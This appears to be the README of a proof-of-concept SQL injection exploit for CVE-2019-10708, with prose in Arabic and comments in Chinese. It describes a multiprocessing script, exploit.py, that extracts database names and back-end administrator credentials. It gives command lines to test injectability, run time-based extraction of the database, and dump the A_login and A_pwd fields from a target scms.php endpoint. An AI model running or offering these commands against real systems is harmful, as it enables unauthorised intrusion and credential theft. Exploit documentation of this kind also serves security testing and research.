
CVE-2019-10708 إثبات المفهوم لحقن SQL
exploit.py هو دليل إثبات (PoC) لثغرة CVE-2019-10708، يستخدم معالجة متعددة (multiprocessing) للحقن، للحصول على أسماء قواعد البيانات وبيانات اعتماد مدير النظام الخلفية (يوصى باستخدام إصدارات قبل 20190401).
# 測試是否可注入
python3 exploit.py http:localhost/js/scms.php --test
# sleep時間為60秒與取得資料庫
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# 取得A_login與A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd